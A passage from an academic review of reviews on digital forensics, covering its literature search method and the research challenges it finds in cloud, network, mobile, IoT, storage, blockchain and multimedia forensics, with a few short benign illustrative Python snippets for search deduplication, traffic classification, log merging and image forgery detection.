and "synthesis of reviews" [19].

Despite their growing popularity, no standardized reporting guidelines currently exist for umbrella reviews. However, various multidisciplinary teams around the globe work together to develop relevant standardized reporting guidelines that will soon be available [20]. In our case, we rely upon an entirely systematic way to conduct our umbrella review.
In particular, we have used various features of the approach presented in [21] to conduct our review of reviews and provide a transparent, reproducible and sound overview of the scientific literature on digital forensics from a global perspective. Our review protocol consists of five steps, as shown in Figure 1: 1) planning the review, 2) defining research questions, 3) searching literature databases, 4) applying inclusion and exclusion criteria, and 5) synthesising and reporting the results of the literature analysis.

FIGURE 1. Detail of the research methodology steps.

A. SEARCH STRATEGY
As previously stated, our overall survey process is based on several predefined research questions relevant to the digital forensics literature. We conducted extensive research addressing the various technical/functional/security challenges of the digital forensics literature guided by these research questions. To this end, we performed a systematic literature search without time constraints in May 2021, which was subsequently updated in November 2021. The main search engines used were Web of Science (WoS), Scopus and Google. Scopus and WoS were used to locate all scientific-related literature due to their multidisciplinary coverage and scope [22], while Google was used to locate relevant standards and best practices (grey literature). We queried Scopus and WoS using the terms "digital forensics and review or survey" in the title, keywords, and abstract of all articles. It is worth noting that the first bulk search query yielded 536 unique results (combining both sources).

Electronic searches using Google also turned up relevant grey literature, such as unpublished research commissioned by governments or private/public institutions. In particular, we looked at the first 200 Google results for the queries "digital forensics and reviews" and "digital forensics and surveys" to find the published grey literature. It is worth noting that we used Google searches as a supplement to our primary search strategy (especially for streamlining the assessment), and Scopus and WoS were our primary source for finding scientific-related literature. Furthermore, compared to the bibliography retrieved from Scopus and WoS, the total number of documents retrieved from Google was relatively low.

We discovered additional studies using the so-called snowball effect (backward and forward), which involved searching the references of key articles and reports for additional citations [23]. For instance, additional grey literature was discovered by manually searching the reference lists in several reports, particularly research and committee reports or policy briefs from private and public sector institutions/organizations. For this study, we take into consideration 109 research papers and 51 reports. The 109 papers are used for identifying relevant challenges/trends across different digital forensics domains (see Section III). The 51 reports were used to derive further insights about the state of practice regarding digital forensics methodologies, practices and standards, as well as to discuss future trends and open challenges from a policy perspective (see Sections IV and V).
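For reproducibility, the kind of query described above can be expressed in the advanced-search syntax of the two databases and the exports merged and deduplicated offline. The snippet below is an illustrative approximation: the exact field codes accepted by Scopus (TITLE-ABS-KEY) and Web of Science (TS) may vary with the platform version, and the CSV column names used for deduplication are assumptions about a typical export.

```python
import csv

# Approximate advanced-search strings for the query described above.
SCOPUS_QUERY = 'TITLE-ABS-KEY("digital forensics" AND (review OR survey))'
WOS_QUERY    = 'TS=("digital forensics" AND (review OR survey))'

def merge_exports(paths):
    """Merge database exports (CSV) and deduplicate by DOI, falling back to title."""
    seen, records = set(), []
    for path in paths:
        with open(path, newline="", encoding="utf-8") as f:
            for row in csv.DictReader(f):
                key = (row.get("DOI") or row.get("Title", "")).strip().lower()
                if key and key not in seen:
                    seen.add(key)
                    records.append(row)
    return records

# Example usage with hypothetical export files:
# unique = merge_exports(["scopus_export.csv", "wos_export.csv"])
# print(len(unique), "unique records")
```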
B. SELECTION OF STUDIES
We used various predefined exclusion and inclusion criteria, as described in Table 2, to assess the eligibility of the retrieved literature, both academic and grey. Some exclusion criteria were applied before introducing the literature into the bibliographic manager (language, subject area and document type restrictions). It is also worth noting that we have only examined review papers and reports written in English. Our overall selection process steps are the following: (i) we initially evaluated the relevance of the titles of all scientific articles and reports; articles/reports fulfilling one of the exclusion criteria were removed from the analysis and sorted according to the reason for their removal; (ii) subsequently, we evaluated the relevance of all paper abstracts and report introduction sections (grey literature); articles and/or reports that met one of the defined exclusion criteria were excluded from the analysis, and we documented the reason for exclusion; (iii) we also performed a full-text reading, and some additional articles/reports were excluded and sorted by reason of exclusion during this step. We resolved any potential disagreements among authors about the relevance of the retrieved articles/reports through discussion until reaching a unanimous consensus. We omitted several studies because they were not reviews or surveys (for example, papers relevant to financial forensics investigation or business forensics). We also discarded from the analysis articles that did not meet the inclusion criteria.

C. ANALYSIS AND REPORTING
All articles and/or reports that met the inclusion criteria were analyzed (in emerging themes) using a qualitative analysis software (MAXQDA). The authors carried out the thematic content analysis independently. We applied various qualitative analysis methods (such as narrative synthesis and thematic analysis) to classify and synthesise the extracted data in a sound and comprehensive manner. The results of our analysis are presented in Sections III and IV.

D. BIBLIOGRAPHIC ANALYSIS
In this section, we present a descriptive analysis of the scientific papers included in the challenges-based and domain-specific classification (see Figure 2). The descriptive analysis includes 109 research papers published from 2006 until the end of November 2021. The purpose of the descriptive analysis presented is three-fold:
1) It enhances the statistical description, aggregation, and presentation of the constructs of interest or their associations in the relevant literature (publications per year and domain, etc.).
2) It contains insights into current research trends in the area of digital forensics and a critical discussion of the challenges identified. It therefore supports the classification structure presented in Section III.
3) It allows us to visually demonstrate the diverse research approaches used up to this point in the scientific literature regarding the proliferation of digital forensics review papers.

The distribution of publications over time is depicted in Figure 2. In particular, Figure 2 shows a year-by-year analysis of the selected papers. It is worth noting that the number of publications has increased significantly after 2017. Until the end of 2017, there were only about 38 review papers addressing issues of digital forensics. However, from 2017 onwards, the number of reviews published in the scientific literature has risen to nearly 70. As a result, over the last four years, research in the area of digital forensics has slowly but steadily increased. This upward trend reflects the key public and policy impact of digital forensics nowadays.
Figure 2 also shows the domain-specific distribution of the 109 review papers included in our analysis. It is worth noting that we have identified seven (7) prevalent areas of research interest in digital forensics: Blockchain, Cloud, Filesystem and databases, Multimedia, IoT, Mobile, and Networks. Multimedia forensics attracts most of the current digital forensics research (38 out of the 109 review papers), followed by Filesystem and database forensics papers (18 out of 109). Both streams reflect that the widespread use of mobile devices with lower-cost storage and increased bandwidth has resulted in a massive generation of multimedia-related content. Furthermore, various miscellaneous review papers (applications that do not fit into any of the above categories) demonstrate the multidisciplinary nature of digital forensics. These multidisciplinary review papers represent research conducted in areas such as social media, smart grid, unmanned aerial vehicles, etc.

TABLE 2. Selection criteria of the retrieved literature.

FIGURE 2. Year-wise analysis of the selected literature per domain.

III. TAXONOMY OF CHALLENGES-BASED DIGITAL FORENSICS RESEARCH
In this section, we summarise the surveys/literature reviews collected following a rigorous statistical methodology based on the literature, as described in Section II. The topics of this classification have been systematically selected according to the contents of the reviewed literature, and thus reflect the digital forensics research landscape and illustrate with high fidelity the heterogeneity of digital forensic solutions. The classification of digital forensics topics is graphically represented in Figure 3. In each case, we discuss the main limitations and challenges proposed in the literature. More precisely, we extract the challenges at a research-field domain level (i.e., we group in a higher hierarchical level, when possible, the limitations of the methods presented in the surveys) to give a more comprehensive perspective and to enable further cross-topic comparisons in Section III-I.

FIGURE 3. Challenges-based and domain-specific mindmap abstraction of digital forensics topics identified in the literature.

A. CLOUD
Researchers, as well as government agencies, have thoroughly explored many of the challenges in cloud forensics, though some challenges still remain to be addressed. For example, the diversity of embedded OSs with shorter product life cycles, as well as the numerous smartphone manufacturers around the world, are challenges in this research area. In the literature, we can find research works that have addressed challenges in cloud forensics and their solutions from different perspectives. Purnaye et al. [7] explored the different dimensions of cloud forensics and categorised the main challenges of this topic. Alex et al. [24] discussed challenges in cloud forensics related to data acquisition, logging, dependence on cloud service providers, chain of custody, crime scene reconstruction, cross-border law and law presentation. Khanafseh et al. [25] pointed out several challenges in cloud forensics, such as the unification of log formats; missing terms and conditions regarding investigations in the Service Level Agreement (SLA), which is the main point of agreement between the user and the cloud service provider; lack of forensics expertise; decreased access to forensic data and control over forensic data at all levels from the customer side; and lack of international collaboration and legislative mechanisms in cross-nation data access and exchange.

Pichan et al. [26] considered the Digital Investigative Process (DIP) model [27] for describing the challenges emerging at each phase of the digital investigation process and provided solutions for the respective identified challenges. The challenges they identified in cloud forensics are unknown physical location, decentralized data, data duplication, jurisdiction, encryption, preservation, dependence on the CSP, chain of custody, evidence segregation, distributed storage, data volatility and integrity. Similar to the works of Khanafseh et al. and Pichan et al., the authors in [28] also identified the challenges in cloud forensics and analyzed them on the basis of their significance. Park et al. [29] discussed the different challenges within cloud forensic investigations, highlighting the relevance of proactive models and discussing the integration of smart environments to enhance the robustness of forensic investigations. The authors in [30] provided a categorization of the cloud forensic challenges based on the cloud forensic process stages. Amminezhad et al. [31] described the different challenges in cloud forensics that were addressed by other authors by performing an exploratory analysis. Rahman et al. [32] broadly classified the existing challenges in cloud forensics, classifying the literature into three categories, namely multi-tenancy, multi-location and scope of user control. Finally, the authors in [33] identified and discussed the major challenges that occur at each stage of the cloud forensic investigation, according to well-known forensic flows.

As evident from the large number of published literature reviews/surveys, cloud forensics is quite an explored research topic. Despite the considerable amount of research in cloud forensics, there still exist a number of challenges/limitations that need much attention, as discussed by NIST [34]. In Table 3, we present a summary of the challenges extracted from the cloud forensic review/survey articles. From this summary, we observe that there is a dearth of research work focusing on standard cloud forensic tools and technologies in the cloud environment. Also, very limited works have concentrated on pointing out feasible solutions to the challenges present in cloud forensics.

TABLE 3. High-level extraction of limitations in cloud forensics.

B. NETWORKS
Data monitoring and acquisition from network traffic are mandatory to prevent most of nowadays' cyber-attacks [36]–[38], including, but not limited to, Distributed Denial of Service (DDoS), phishing, DNS tunnelling, Man-in-the-Middle (MitM) attacks, SQL injection and others [39], [40].
Regardless of the orchestration mechanism behind them (i.e., single attackers or orchestrated botnets), the analysis and mitigation mechanisms rely on the proper monitoring and analysis of computer network traffic to collect information, evidence and proof of any intrusion or vulnerability. For this purpose, several well-known tools exist, such as network forensic analysis tools, which provide functionalities such as traffic sniffing, Intrusion Detection Systems (IDS), protocol analysis, and Security Event Management (SEM) [40]–[43]. Nevertheless, one of the challenges of network forensics is to achieve accurate and efficient packet analysis in encrypted network traffic, since it is far more challenging than the analysis of unencrypted traffic. As the authors state in [40], [44], utilizing machine learning in packet analysis is evolving into a complex research field that aims to address the analysis of unknown features and encrypted network data streams.

Regarding the research and forensics-related surveys tackling such issues, several reviews recall the primary methodologies and tools for network forensic analysis, such as the works seen in [36], [45], yet they were conducted almost a decade ago. Therefore, taxonomies classifying forensic frameworks suitable for network forensics are crucial [40]. An interesting review focusing on the attacker's perspective, in terms of attack behaviour and plan identification, as well as prevention mechanisms, can be found in [46]. Finally, some protocol-oriented reviews, analyzing the IEEE 802.11 protocol [43] and, more recently, 5G networks [42], discuss specific vulnerabilities in their corresponding contexts. In general, the main challenges of network forensics, as identified by the authors of the aforementioned works, are classified in Table 4.

TABLE 4. High-level extraction of challenges in network forensics.
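Since payloads are increasingly encrypted, machine-learning approaches of the kind mentioned above typically work on flow-level metadata rather than packet contents. The following is a minimal sketch of that idea using scikit-learn on synthetic flow features (duration, packet count, byte count, mean inter-arrival time); the feature set and labels are invented for illustration and do not come from the cited surveys.

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report

rng = np.random.default_rng(0)

def synth_flows(n, malicious):
    """Synthetic flow records: [duration_s, pkts, bytes, mean_iat_s]."""
    scale = 3.0 if malicious else 1.0
    return np.column_stack([
        rng.exponential(2.0 * scale, n),        # flow duration
        rng.poisson(20 * scale, n),             # packet count
        rng.normal(8000 * scale, 2000, n),      # byte count
        rng.exponential(0.1 / scale, n),        # mean inter-arrival time
    ])

X = np.vstack([synth_flows(500, False), synth_flows(500, True)])
y = np.array([0] * 500 + [1] * 500)             # 0 = benign, 1 = suspicious

X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=0)
clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X_tr, y_tr)
print(classification_report(y_te, clf.predict(X_te), target_names=["benign", "suspicious"]))
```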
For example, it is not clear whether investigation procedures should be model-speci c for each device or should be generic enough to form a standardized set of guidelines applicable to forensics procedures [49]. Another challenge is the need to perform live forensics (mobile device should be powered on) [50]. In addition, an important barrier for actually conducting MF investiga- tions relates to the various networking capabilities of smart- phones, which render the overall MF processes dif cult to manage, particularly due to the complex structure of the cloud computing environment [51]. Finally, due to the security measures inherent to modern mobile devices, an investigator must actually break into the device using an exploit that will most likely alter the device data. Clearly, the latter violates the Association of Chief Police Of cers (ACPO) principle 25470 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews and introduces numerous procedural issues for a forensic investigation. In Table 5, we provide a classi cation of MF approaches' current challenges. TABLE 5. High level extraction of limitations in mobile forensics. D. IOT Although signi cant in terms of improved data availability and operational excellence, the broad adoption of IoT devices and IoT-related applications have brought forward new secu- rity and forensics challenges. IoT forensics is a branch of digital forensics dealing with IoT-related cybercrimes and includes the investigation of connected devices, sensors and the data stored on all possible platforms. According to the literature, several of the current limita- tions of IoT forensics include the management of different streams of data sources, the complicated three-tier architec- ture of IoT, the lack of standardized systems for capturing real-time logs and storing them in a valid uniform form, the preparation of highly detailed reports of all information gathered its corresponding representation, the preservation and acquisition of evidence considering its volatility and value of data, and the adoption of routine forensic tasks in the IoT ecosystem [52][56]. Data encryption trends also present additional challenges for IoT forensic investigators, and arguably cryptographically protected storage systems is one of the most signi cant barriers hindering ef cient dig- ital forensic analysis [54], [57], [58]. Other studies high- light additional limitations of IoT forensics processes such as interoperability and availability issues related to the vast amount of connected IoT devices [54][56], [59], the Big Data nature of the IoT forensics evidence (Variety, Velocity, Volume, Value, Veracity) [55], [58], [60] and the various security storage challenges of IoT forensics evidence, espe- cially when related to biometric data [61]. Finally, various regulatory-related challenges also exist in the IoT forensics domain, particularly issues relevant to the ownership of data in the cloud as de ned by region-speci c laws [54][56], [58], [59]. For instance, service-level agreements stipulating the ``terms of use'' of the cloud resources between the cloud customer and the cloud service provider do not incorporateforensic investigations' provisions. Legislative frameworks adopted in speci c regions, such as the GDPR in Europe, also pose signi cant challenges for IoT forensic investigations, particularly data privacy provisions [53][56]. 
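As a small illustration of the log-heterogeneity problem noted above, the following sketch — with purely illustrative device names, field names and sample records — normalises JSON and CSV event streams from two hypothetical IoT devices into a single, time-ordered timeline, the kind of uniform representation whose absence is repeatedly reported as a limitation.

```python
# Minimal sketch (illustrative field names and sample data): merging
# heterogeneous IoT event records into one time-ordered evidence timeline.
import csv
import io
import json
from datetime import datetime, timezone

def from_json_lines(text, source):
    # Records like {"ts": "2022-01-05T10:00:03Z", "event": "motion_detected"}
    for line in text.splitlines():
        rec = json.loads(line)
        ts = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
        yield ts, source, rec["event"]

def from_csv(text, source):
    # Records like "1641376801,temp=21.5" (epoch seconds, reading)
    for row in csv.reader(io.StringIO(text)):
        ts = datetime.fromtimestamp(int(row[0]), tz=timezone.utc)
        yield ts, source, row[1]

if __name__ == "__main__":
    camera = ('{"ts": "2022-01-05T10:00:03Z", "event": "motion_detected"}\n'
              '{"ts": "2022-01-05T10:00:07Z", "event": "clip_uploaded"}')
    thermostat = "1641376801,temp=21.5\n1641376805,temp=23.0"
    timeline = sorted(list(from_json_lines(camera, "camera")) +
                      list(from_csv(thermostat, "thermostat")))
    for ts, source, event in timeline:
        print(ts.isoformat(), source, event)
```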
Finally, the use of blockchain and its capability to enhance IoT forensic investigations has been also discussed in [54]. In Table 6 we provide a classi cation of the current challenges of IoT forensics approaches. TABLE 6. High level extraction of limitations in IoT forensics. E. FILESYSTEMS, MEMORY AND DATA STORAGE FORENSICS Forensic analysis of large lesystems requires ef cient meth- ods to manage the potentially large amount of les and data contained in them. System logs are one of the most used information sources to leverage forensic investigations. In [62] the authors provide a review of the publicly available datasets used in operating system log forensics research and taxonomy of the different techniques used in the forensic analysis of operating system logs. The taxonomy is cre- ated based on a common investigation format that includes event logs recovery, event correlation, event reconstruction and visualization. Distributed lesystem forensics is even a more challenging task, such as in the case of identifying the malicious behaviour of the attackers by analysing cloud logs [63]. Nevertheless, the accessibility attributes associated with cloud logs impede the goals of investigating such infor- mation, as well as other challenges, similar to those extracted in Section III-A. Another challenging area is the analysis of proprietary systems such as SCADA systems. In [64] the authors present a survey on digital forensics that are applied to SCADA systems. The survey describes the challenges that involve VOLUME 10, 2022 25471 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews applying digital forensics to SCADA systems as well as the range of proposed frameworks and methodologies. The work also focuses on the research that has been carried out to develop forensic solutions and tools that can be tailor- made for the SCADA systems. Recent research has revealed that malware developers have been using a broad range of anti-forensic techniques and escape routes in-memory attacks and system subversion, including BIOS and hypervisors. In addition, code-reuse attacks such as returned oriented programming pose a serious remote code execution threat. To neutralise the effects of malicious code, speci c tech- niques and tools such as transparent malware tracers, system- wide debuggers were proposed. In [65], authors present a survey on the state-of-the-art techniques that demonstrate the capability of thwarting the anti-forensic strategies previously mentioned. Memory forensics refers to the forensic analysis of a sys- tem's memory dump. A system's memory can contain evi- dence related to the usage of the system, including the list of running processes, network connections, or the keys for the driver's encryption. Usually, such data are not stored in the permanent storage of the system and are completely lost when the system is turned off or unplugged from the power. In the literature, we can nd surveys devoted to the analysis of the memory acquisition techniques [66], [67] (i.e., both hardware and software-based), the subsequent memory analysis [68], and the available tools [67]. The main challenges of memory forensics derive from the fact that memory is volatile, so it has to be acquired when the system is running and thus probably modi ed by the running applications. 
This can lead to the page smearing issue [68], i.e., inconsistencies between the state of the memory as described by the page tables compared with the actual contents of the memory. Another issue that can occur during the memory acquisition is the incorpora- tion of pages, which are not present in the memory due to page swapping or demand paging [68]. Finally, although the memory acquisition techniques should be OS and hardware agnostic [66], each OS architecture handles the memory dif- ferently and is equipped with distinctive tampering protection mechanisms that hinder access to memory. A database (DB) is the most traditional way to organise and store data. The majority of applications and online ser- vices deploy some type of DB to store records about their customers, nancial records, inventory, etc. Besides the vast amount of data that could be contained in a DB, a database management system (DBMS) which allows the end-users to administer the DB and store and access the data in a speci c format, can also provide evidence of actions in user- level granularity. For instance, it can reveal who and when stored/accessed speci c records. Therefore, digital forensics for DB has attracted the attention of the research commu- nity [69]. From this perspective, several surveys focused on database digital forensics based on the log les, metadata, and similar types of artefacts for the case of relational and NoSQL DB [70][72]. Furthermore, other authors addressed the digital forensic opportunities on the procedure of dataTABLE 7. High level extraction of challenges in file system, memory and data storage forensics. aggregation and analysis, as well as their structural architec- ture to bene t forensic procedures [69], [73]. Digital triage is of special relevance here since reviewing many poten- tial sources of digital evidence for speci c information by using either manual or automated analysis is mandatory to enhance investigations [73]. Nevertheless, the authors high- light that the legitimacy of several acquisition procedures is constrained by the applicable legislation and that the current state of practice requires more ef cient solutions, especially when dealing with huge amounts of data. In [74], the authors presented a framework for database forensic investigations enhanced by forensic experts' opinions with the aim to over- come the main issues that investigator's face, such as the lack of standardized tools and different data structures and log structures. Considering the increasing amount of IoT technologies and small devices that require live data analysis due to the volatility of the data stored in them, it is crucial to develop new strategies to enhance data acquisition procedures [75]. In the context of database forensics and data acquisition, the challenges of big data analysis and data mining techniques for digital forensics [76], [77], and text clustering [78] were investigated. Moreover, a survey of techniques to perform similarity digest search is provided in [79]. Table 7 summarises the main limitations and challenges extracted from the literature analysed in this section. F. BLOCKCHAIN Blockchain technology has been constantly integrated into existing systems or used as the basis to rebuild systems from 25472 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews scratch in various domains. 
Besides the nancial domain to which it was initially applied, through bitcoin, blockchain technology is currently used in various other use cases such as supply chain management, cybersecurity enhancement, document/certi cates validation, crowdfunding campaigns, and more [80]. Additionally, because nancial system set on blockchain provide more privacy than traditional pay- ment systems, it is common for cryptocurrencies to be used for criminal activities [81]. This sets blockchain forensics methodologies as a necessity [82] due to the large volume of data that are stored in blockchain systems and the number of processes that are managed by such systems. The main prop- erty of blockchain-based systems is the guaranteed protection of data integrity, which is directly related to forensic analysis. On the one side, this property makes forensic analysis more manageable. However, on the other side, this may complicate the process as users may be more cautious when interacting with such systems. It has to be noted that a large portion of blockchain systems are public, allowing access to everybody and thus making forensic analysis a surplus process. A forensics investigator can set up a node in a public blockchain network, sync it with the rest of the nodes and obtain a local copy of the ledger. Even in such cases, the structure of the information stored in the ledger of blockchain systems is not optimal with respect to retrieving all required data (e.g., for a speci c account or a speci c smart contract), so ef cient mechanisms are required [83] to extract valuable information out of the large volume of data stored in public ledgers [84]. In the case of private blockchain systems, the ledger data are not publicly available and traditional forensics approaches have to be applied to blockchain nodes to extract data. Even if data are by default publicly available, it is still challenging to identify malicious activity on such platforms. It is common for deployed smart contracts to suffer from var- ious vulnerabilities either due to poor implementation or not properly con gured blockchain networks [85]. In such cases, users can take advantage of such vulnerabilities, mainly aim- ing at nancial pro t. It is challenging to detect such activity and identify the actors that have initiated it. Smart contracts execution is not a straightforward process, and past execution cannot be easily repeated in a forensic sound way [86]. Apart from that, smart contracts may also get self-destructed by a special OPCODE that makes following past transactions even harder [87]. Furthermore, privacy concerns have been raised concern- ing early open public blockchain systems, and thus, there have been multiple alternative systems that make use of var- ious privacy-enhancing techniques such as zero-knowledge proofs, onion routing or ring con dential transactions to pro- tect users privacy [88]. In such cases, forensics analysis of either network nodes or users' wallets is required to retrieve either logs or cryptographic keys that can be used along with data existing on public ledgers and provide more information about the transactions that have taken place.While the data stored in the ledger are of great impor- tance, there are more data to be considered when analyzing a blockchain node. The ledger holds all committed transac- tions, but a blockchain node stores more information with respect to its interactions with other nodes or clients. 
For example, the IP of the client that has connected to a node to submit a transaction or the activity of a speci c node in the network (e.g., sync requests) are not included in the ledger's data. On top of those, multiple security blockchain attacks are mainly targeted against the infrastructure or the network's backbone and not against its content. Mining attacks, network and long-range attacks [89], [90] target at taking control of the blocks formation process, to maliciously alter past committed transactions and achieve double-spending attacks. In such cases, digital evidence from deployed nodes is the only way to prove malicious activity. At the same time, the size of the network in public blockchain systems makes it even harder to retrieve the required evidence. Table 8summarises the main challenges extracted from the blockchain forensics literature. TABLE 8. High level extraction of challenges in blockchain forensics. G. MULTIMEDIA Due to the increasing number of ubiquitous technologies (e.g., IoT devices, smartphones, wearables) leveraged by the 4thindustrial revolution, as well as a substantial improvement in the connectivity capabilities in smart scenarios due to 5G, the amount of multimedia prosumers (i.e., both producers and consumers of data) is increasing dramatically year after year.2Nevertheless, such multimedia content growth is a double-edged sword. On the one hand, it is a synonym of opportunities for the industry, companies and users. On the other hand, it augments the possible vulnerabilities and attack vectors of such systems, which malicious users can exploit. Digital forensics in the context of multimedia has received substantial attention from the research community. There exist numerous image forgery detection surveys exploring the topic from a global perspective [91][99]. In this con- text, pixel-based image forgery detection is one of the main topics [100], including image splicing forgery [101], and copy-move forgery [102][104], which is a well-known tech- nique in which parts of the current images are used to cover/hide speci c characteristics. Some authors focused on 2https://wearesocial.com/blog/2020/01/digital-2020-3-8-billion-people- use-social-media, https://www.cisco.com/c/en/us/solutions/collateral/ executive-perspectives/annual-internet-report/white-paper-c11-741490. html VOLUME 10, 2022 25473 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews TABLE 9. High level extraction of challenges in multimedia digital forensics. passive techniques to detect forgery [105], or carving on speci c le formats such as JPEG [106]. Other image foren- sics surveys analysed topics such as hyperspectral image [92], [107], image authentication [108], the affectation of noise in images [109] and image steganalysis [110][114]. Another set of surveys focus on the speci c context of child abuse material and its detection through image and video analysis [115][118]. More recently, the advent of deep learning techniques has enhanced the capabilities of image integrity detection and veri cation, outperforming tra- ditional methods in several image-related tasks, especially in these where anti-forensic tools were used [113], [114], [119]. In the context of video les, we can nd surveys on video steganalysis [113], [114], [120], video forgery detection [95], [96], [98], [114], [121], [122], video forensic tools [95], [113], [123], [124], video surveillance analysis [125], [126], and video content authentication [127]. 
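As a simplified illustration of copy-move detection, the sketch below — assuming the third-party opencv-python package and an illustrative file name, photo.jpg; it is not a production-grade detector — flags pairs of keypoints whose descriptors are nearly identical yet lie far apart in the image, a typical symptom of a region that was copied and pasted elsewhere in the same picture.

```python
# Minimal sketch: candidate copy-move regions via keypoint self-matching.
# Assumes the third-party "opencv-python" package; file name is illustrative.
import math
import cv2

def copy_move_candidates(image_path, min_pixel_distance=40, max_descriptor_distance=10):
    img = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)
    if img is None:
        raise FileNotFoundError(image_path)
    orb = cv2.ORB_create(nfeatures=2000)
    keypoints, descriptors = orb.detectAndCompute(img, None)
    if descriptors is None:
        return []
    matcher = cv2.BFMatcher(cv2.NORM_HAMMING)
    candidates = []
    # Match the descriptor set against itself; the best match of a descriptor
    # is the keypoint itself, so the second match is its nearest neighbour.
    for matches in matcher.knnMatch(descriptors, descriptors, k=2):
        if len(matches) < 2:
            continue
        m = matches[1]
        p1 = keypoints[m.queryIdx].pt
        p2 = keypoints[m.trainIdx].pt
        # Nearly identical descriptors far apart suggest a duplicated region.
        if m.distance <= max_descriptor_distance and math.dist(p1, p2) >= min_pixel_distance:
            candidates.append((p1, p2, m.distance))
    return candidates

if __name__ == "__main__":
    for p1, p2, d in copy_move_candidates("photo.jpg"):
        print(f"possible duplicated region: {p1} <-> {p2} (descriptor distance {d})")
```

Practical detectors add geometric verification and dense block matching on top of this idea, but the self-matching step conveys the core intuition behind copy-move analysis.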
Finally, digital audio forensics has also been studied in [128]. Table 9 summarises the main limitations and challenges extracted from the multi- media forensic literature. H. MISCELLANEOUS This section is devoted to the digital forensics reviews that fall beyond the domain categorisation of the previous paragraphs. As observed in most topics, anti-forensics can be under- stood as a standalone concern in digital forensics, which requires investigation in each context. The term anti-forensics refers to methods and strategies that prevent forensic inves- tigators and their tools from achieving their goals. There areseveral examples of anti-forensic methodologies [129], such as encryption, data obfuscation (e.g., trail obfuscation), arti- fact wiping, steganography and image tampering [130], protected/hidden communications (e.g., tunnelling, onion routing), malware anti-sandbox/debug, VM and in general anti-analysis methods [131][134], and spoo ng. As stated in [135], anti-forensic methods exploit the dependence of human elements on forensic tools, as well as the limita- tions of the underlying hardware in terms of architecture and computational power. Therefore, enhancing the train- ing and knowledge level of investigators and more robust forensic procedures (e.g., anti-anti forensic techniques [130]) are critical to minimise the impact of anti-forensics. In this line, some authors argue that the use of proactive foren- sics models could help enhancing the robustness of forensic investigations [136]. Another emerging topic in digital forensics is related to unmanned aerial vehicles (UA Vs), or more commonly known as drones [137]. The applications and versatility of these devices are becoming more popular in a myriad of contexts, from industrial to military applications. One of the main challenges of drone forensics is the set of different hardware components that are part of a drone [138], and the partic- ular treatment that they require (i.e., with special regard to advanced anti-forensic techniques taking place [139], as well as the necessity of live forensics [137], [140] in this context). For instance, drones consist of sensors, ight controllers, electronic and hardware components, on-board computers, and radiofrequency receivers, each one linked to one or many evidence sources in terms of, e.g., data storage (the differ- ent memory sources present in the drone, such as memory cards storing media, or other software), data communications and other logs and data stored in sources related to the drone, such as the drone controller and external cloud-based sources [141], [142]. At the moment of writing, there are no baseline principles, standards, nor legislation covering all the particularities of forensic drone investigations [137], [142]. Thus, efforts towards the establishment of sound protocols, speci c forensic frameworks, as well as drone-based forensic tools are critical [137]. In [143], authors surveyed the different dimensions and concerns which digital forensics should cover in the context of social networks. The authors discussed several aspects of social networks, such as privacy and security issues, the criminal and illegal acts that can occur, and the attacks on the underlying platform and the users. In addition, they describe several strategies to detect such abnormal behaviours along with the necessity to develop both pro-active and reactive mechanisms. 
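The graph-analytic side of such investigations can be illustrated with a minimal sketch that uses the third-party networkx package and a hard-coded, purely illustrative edge list to group frequently interacting accounts into candidate communities.

```python
# Minimal sketch: candidate communities of interacting accounts.
# Assumes the third-party "networkx" package; the edge list is illustrative.
import networkx as nx
from networkx.algorithms.community import greedy_modularity_communities

# Each edge represents an observed interaction (message, transaction, call)
# between two accounts recovered during an investigation.
edges = [
    ("alice", "bob"), ("alice", "carol"), ("bob", "carol"),   # one cluster
    ("dave", "erin"), ("erin", "frank"), ("dave", "frank"),   # another cluster
    ("carol", "dave"),                                        # weak bridge
]

graph = nx.Graph()
graph.add_edges_from(edges)

for i, community in enumerate(greedy_modularity_communities(graph), start=1):
    print(f"community {i}: {sorted(community)}")
```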
In terms of community detection, graph analytic methods and tools are crucial to detect criminal networks in different contexts, such as nance, terrorism, and other het- erogeneous sources [144]. In [8], authors surveyed the efforts done so far on the analysis of social network shared data according to source identi cation, integrity veri cation and platform provenance. Moreover, authors discussed the cur- rent methodologies, and highlighted the current challenges 25474 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews along with the need for multidisciplinary approaches to over- come them. A sector that is receiving increasing attention due to its crit- ical relevance to the proper functioning of our society is the energy sector, and more concretely, the smart grid. In [145], authors explore practical cybersecurity models and propose some guidelines to enhance the protection of the smart grid against cyber threats. Moreover, they explore software- de ned networks and their main bene ts and challenges. Finally, the authors propose a conceptual forensic-driven security monitoring framework and highlight the relevance of forensics by design in development phases. Context-aware scenarios such as smart cities have been also receiving increased attention due to their complex structures, requiring the continuous data collection, processing and interaction between a myriad of devices [146], [147]. Digital forensics in this particular scenario is a recent paradigm which requires further efforts from the research community to enhance cyber resilience and to provide ef cient incident response mechanisms [147]. I. CHALLENGE ANALYSIS AND AGGREGATED RESULTS The classi cation of challenges and limitations according to each topic of the taxonomy has been conducted to keep a balance between accurate descriptions of challenges and hier- archical classi cation. On the one hand, we want to facilitate identifying the gaps and limitations of each topic and pro- vide a clear path for both new and experienced investigators towards the corresponding literature. On the other hand, and as stated in Section I, we provide the reader with a clear overview of the research lines that should be strengthened in the digital forensics ecosystem, as well as their interre- lations according to each topic of our taxonomy. Therefore, we used the extracted challenges of each topic and merged the ones appearing more than once (i.e., the ones appearing only in their corresponding topic were ignored due to their speci city) to create a comprehensive overview of the digital forensics challenges in Table 10. As it can be observed, we identi ed several limitations of digital forensics that can be applied in several topics or contexts and thus, indicate the need to devote more research efforts towards them. Note that, for instance, the last topic of the Table 10appears to be only affecting IoT, yet we identi ed this challenge in the miscella- neous topic, and thus, we decided to include it. Nevertheless, since several topics are analysed in such a category, we did not represent them in Table 10. The most reported challenge is the sound data acquisition from heterogeneous sources and its interpretation, includ- ing different hardware and monitoring processes collecting data and logs 